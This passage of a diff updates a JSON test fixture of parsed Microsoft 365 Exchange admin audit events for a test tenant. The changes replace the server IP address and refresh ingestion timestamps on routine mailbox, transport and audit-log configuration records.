bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3095,12 +3095,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3152,8 +3152,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177676Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853162700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3173,12 +3173,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3210,7 +3210,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3222,8 +3222,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177679Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853167600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3243,12 +3243,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3279,7 +3279,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3291,8 +3291,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177681600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853172700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3312,12 +3312,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3348,7 +3348,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3360,8 +3360,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177684300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853177600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3381,12 +3381,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3417,7 +3417,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3429,8 +3429,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177687100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853184200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3450,12 +3450,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3500,7 +3500,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3512,8 +3512,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177689800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853190400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3533,12 +3533,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3581,7 +3581,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3593,8 +3593,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177692500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853196300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3614,12 +3614,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3662,7 +3662,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -3674,8 +3674,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177695100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 